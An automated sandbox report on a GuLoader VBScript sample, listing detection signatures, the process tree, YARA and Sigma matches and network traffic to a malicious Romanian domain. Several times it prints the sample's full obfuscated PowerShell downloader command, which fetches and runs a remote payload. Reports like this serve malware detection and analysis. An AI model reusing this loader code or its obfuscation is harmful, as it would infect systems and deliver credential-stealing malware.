Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IMG-35235235523525235252532535Selvfinansieret.vbs

Overview

General Information

Sample name:IMG-35235235523525235252532535Selvfinansieret.vbs
Analysis ID:1448280
MD5:a6cf7a17bac5acfed8b42dae16767f8e
SHA1:2f9499cee74dfb887b549c5766c4f5dfec9743e0
SHA256:412da635eb16946ae92c0648efe4f687771f3625eedeacd3f2889862ed492658
Tags:vbs
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2548 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 2664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5492 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    Process Memory Space: powershell.exe PID: 2664JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 2664INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x2e1438:$b2: ::FromBase64String(
      • 0x329701:$b2: ::FromBase64String(
      • 0x32973d:$b2: ::FromBase64String(
      • 0x32977a:$b2: ::FromBase64String(
      • 0x3297b8:$b2: ::FromBase64String(
      • 0x3297f7:$b2: ::FromBase64String(
      • 0x329837:$b2: ::FromBase64String(
      • 0x329878:$b2: ::FromBase64String(
      • 0x3298ba:$b2: ::FromBase64String(
      • 0x15e03:$s1: -join
      • 0x22ed8:$s1: -join
      • 0x262aa:$s1: -join
      • 0x2695c:$s1: -join
      • 0x2844d:$s1: -join
      • 0x2a653:$s1: -join
      • 0x2ae7a:$s1: -join
      • 0x2b6ea:$s1: -join
      • 0x2be25:$s1: -join
      • 0x2be57:$s1: -join
      • 0x2be9f:$s1: -join
      • 0x2bebe:$s1: -join
      SourceRuleDescriptionAuthorStrings
      amsi64_2664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_2664.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xe0f2:$b2: ::FromBase64String(
        • 0xd121:$s1: -join
        • 0x68cd:$s4: +=
        • 0x698f:$s4: +=
        • 0xabb6:$s4: +=
        • 0xccd3:$s4: +=
        • 0xcfbd:$s4: +=
        • 0xd103:$s4: +=
        • 0xf5aa:$s4: +=
        • 0xf62a:$s4: +=
        • 0xf6f0:$s4: +=
        • 0xf770:$s4: +=
        • 0xf946:$s4: +=
        • 0xf9ca:$s4: +=
        • 0xd8f8:$e4: Get-WmiObject
        • 0xdae7:$e4: Get-Process
        • 0xdb3f:$e4: Start-Process

        System Summary

        barindex
        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", ProcessId: 2548, ProcessName: wscript.exe
        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs", ProcessId: 2548, ProcessName: wscript.exe
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW o
        No Snort rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.3% probability
        Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:49699 version: TLS 1.2
        Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb[j source: powershell.exe, 00000002.00000002.2237168004.0000023E75E4A000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: global trafficHTTP traffic detected: GET /unprincipled.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roConnection: Keep-Alive
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /unprincipled.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: ramirex.roConnection: Keep-Alive
        Source: global trafficDNS traffic detected: DNS query: ramirex.ro
        Source: powershell.exe, 00000002.00000002.2237631693.0000023E75FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
        Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E01DAF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ramirex.ro
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E01373000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: powershell.exe, 00000002.00000002.2204611926.0000023E10072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2185875177.0000023E018BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ramirex.ro/unprincipled.seaP
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownHTTPS traffic detected: 188.215.50.15:443 -> 192.168.2.6:49699 version: TLS 1.2

        System Summary

        barindex
        Source: amsi64_2664.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 2664, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6351
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 6351Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k 